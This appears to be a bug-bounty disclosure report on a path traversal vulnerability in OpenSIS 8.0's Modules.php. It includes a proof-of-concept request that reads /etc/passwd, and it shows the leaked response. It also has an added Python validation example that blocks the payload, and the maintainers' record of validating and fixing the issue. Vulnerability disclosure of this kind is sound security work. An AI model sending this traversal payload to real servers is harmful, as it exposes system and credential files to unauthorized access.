Path Traversal in os4ed/opensis-classic

Valid

Reported on Aug 28th 2021


✍️ Description

The modname parameter of Modules.php in OpenSIS 8.0 is vulnerable to path traversal, enabling read access to arbitrary files on the server.

🕵️‍♂️ Proof of Concept

//  Modules.php
GET /Modules.php?modname=../../../../../../../../../../../../../../../../etc/passwd
HTTP/1.1 302 Found
Location: index.php

                <!-- Main content -->
                <div class="content-wrapper"><div id='content' name='content' class='clearfix'><div id='update_panel'><div id='divErr' class="text-left text-danger"></div><DIV id="Migoicons" style="visibility:hidden;position:absolute;z-index:1000;top:-100;"></DIV>root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
</div><div id='cal' style='position:absolute;'></div></div>
    </div>
        </div>
        </div>
                <!-- /main content -->

💥 Impact

Enables an attacker to access sensitive files
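As an added example (not code from this report or from openSIS), a Python sketch of the kind of check the modname parameter needs before it is used in an include: a syntactic allowlist for an assumed '<module>/<page>.php' shape, followed by a realpath containment check against the modules directory so that '..' sequences and symlinks cannot escape it. The directory layout and the module name 'users/Preferences.php' are constructed for the demo.

```python
import os
import re
import tempfile

# Assumed request shape: Modules.php?modname=<module>/<page>.php (illustrative,
# not the project's own routing). Only this shape is accepted at all.
MODNAME_RE = re.compile(r"^[A-Za-z0-9_]+/[A-Za-z0-9_]+\.php$")


def resolve_modname(modules_root: str, modname: str) -> str:
    """Return the absolute path of the module page to include, or raise ValueError.

    Two independent checks, in order:
      1. syntactic allowlist: only '<module>/<page>.php' with safe characters, so
         '..', absolute paths and NUL bytes never reach the filesystem;
      2. containment: the realpath of the candidate must stay inside modules_root,
         which also defeats symlinks that point outside the tree.
    """
    if not MODNAME_RE.fullmatch(modname):
        raise ValueError(f"rejected modname (bad syntax): {modname!r}")
    root = os.path.realpath(modules_root)
    candidate = os.path.realpath(os.path.join(root, modname))
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError(f"rejected modname (escapes modules root): {modname!r}")
    if not os.path.isfile(candidate):
        raise ValueError(f"rejected modname (no such module page): {modname!r}")
    return candidate


def demo() -> dict:
    """Build a constructed modules tree and run the traversal payload from the
    report plus a legitimate module name through the check. Returns outcomes."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "users"))
        with open(os.path.join(root, "users", "Preferences.php"), "w") as fh:
            fh.write("<?php // constructed module page\n")
        results = {}
        for modname in ("users/Preferences.php",
                        "../../../../../../../../../../../../../../../../etc/passwd",
                        "users/../../etc/passwd",
                        "users/Preferences.php\0.txt"):
            try:
                resolve_modname(root, modname)
                results[modname] = "accepted"
            except ValueError:
                results[modname] = "rejected"
        return results
```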

Z-Old
2 years ago

Admin


Hey N, please confirm your production openSIS URL (localhost, IP address or fake URLs are discouraged).

We have contacted a member of the os4ed/opensis-classic team and are waiting to hear back 2 years ago
We have sent a second follow up to the os4ed/opensis-classic team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the os4ed/opensis-classic team. This report is now considered stale. 2 years ago
N
a year ago

Researcher


@admin Good Day - This was fixed under https://github.com/OS4ED/openSIS-Classic/commit/a2d617977fa159185263845ac75b8c83cddd07f0#diff-122b22cacc5d5ac0e1a9928563c6187f2edae3f7b33035cea6fe34d8a07ef309 -- Would you please be able to manually validate? Thank you

Pavlos
a year ago

Admin


Asked the maintainer to confirm this and your other report :)

Pavlos validated this vulnerability a year ago
N has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Pavlos marked this as fixed in 8.0 with commit a2d617 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Modules.php#L954-L976 has been validated
Pavlos published this vulnerability a year ago